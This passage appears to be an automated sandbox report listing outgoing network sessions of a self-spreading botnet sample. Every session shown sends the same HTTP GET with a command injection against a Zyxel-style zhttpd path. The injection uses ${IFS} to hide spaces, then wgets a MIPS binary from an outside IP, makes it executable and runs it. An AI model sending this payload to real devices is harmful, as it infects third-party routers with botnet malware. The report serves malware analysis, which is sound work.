                                      Jan 14, 2024 15:50:50.404751062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5466192.168.2.145970085.129.250.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404827118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5467192.168.2.1444270108.83.234.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404866934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5468192.168.2.14421241.126.82.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404917002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5469192.168.2.144281657.84.52.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.404987097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5470192.168.2.1447346217.245.72.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.405042887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5471192.168.2.145131693.232.176.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.405100107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5472192.168.2.1441706170.2.90.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.405144930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5473192.168.2.1437208189.3.196.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.405205965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5474192.168.2.1457070101.150.97.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.405257940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5475192.168.2.1443388175.100.153.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.405323982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5476192.168.2.143779874.170.131.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.405354023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5477192.168.2.144940670.242.125.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.405427933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5478192.168.2.1453184185.91.40.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.405486107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5479192.168.2.144319446.33.101.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.419958115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5480192.168.2.145725227.12.118.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420016050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5481192.168.2.143704297.19.227.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420067072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5482192.168.2.1442760195.66.168.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420100927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5483192.168.2.1433286213.245.166.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420156956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5484192.168.2.143912489.64.28.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420196056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5485192.168.2.1459418217.44.162.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420252085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5486192.168.2.143350863.104.194.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420305014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5487192.168.2.144663061.66.201.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420365095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5488192.168.2.144034091.140.235.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420403957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5489192.168.2.1440890192.162.44.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420470953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5490192.168.2.1434272218.122.180.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420516014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5491192.168.2.144457844.28.252.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420568943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5492192.168.2.146036294.179.166.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420591116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5493192.168.2.1448974203.20.162.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420644999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5494192.168.2.145660218.31.235.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420687914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5495192.168.2.1452232126.149.201.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420723915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5496192.168.2.145373636.212.8.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420763016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5497192.168.2.144495048.21.8.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420826912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5498192.168.2.143716246.8.182.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420871973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5499192.168.2.1450112171.92.127.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.420916080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5500192.168.2.1445444191.139.254.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421005011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5501192.168.2.1435962120.142.187.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421077967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5502192.168.2.144553087.100.44.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421108007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5503192.168.2.1433268211.136.99.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421164036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5504192.168.2.1447976179.44.246.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421216011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5505192.168.2.1459108216.245.16.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421288967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5506192.168.2.145148044.101.168.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421340942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5507192.168.2.1432836113.157.91.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421399117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5508192.168.2.1451282103.214.85.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421452999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5509192.168.2.143452666.72.56.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421489000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5510192.168.2.1459344197.106.92.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421538115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5511192.168.2.144281099.245.54.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421592951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5512192.168.2.1455858183.225.215.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421658039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5513192.168.2.1443950161.201.50.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421709061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5514192.168.2.1439680156.19.221.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421731949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5515192.168.2.14542184.103.41.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421791077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5516192.168.2.1433912150.36.26.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421830893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5517192.168.2.143409499.204.191.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421895027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5518192.168.2.1450830161.156.217.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421912909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5519192.168.2.1455418108.190.75.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.421981096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5520192.168.2.1460122101.193.52.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422014952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5521192.168.2.1456098118.127.210.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422044992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5522192.168.2.1442894109.106.2.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422071934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5523192.168.2.145900871.254.85.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422142029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5524192.168.2.1453080164.172.93.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422175884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5525192.168.2.146080642.13.75.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422218084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5526192.168.2.1452042157.123.14.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422236919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5527192.168.2.1436954105.108.131.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.422308922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5528192.168.2.145829483.241.115.192443
                                      TimestampBytes transferredDirectionData
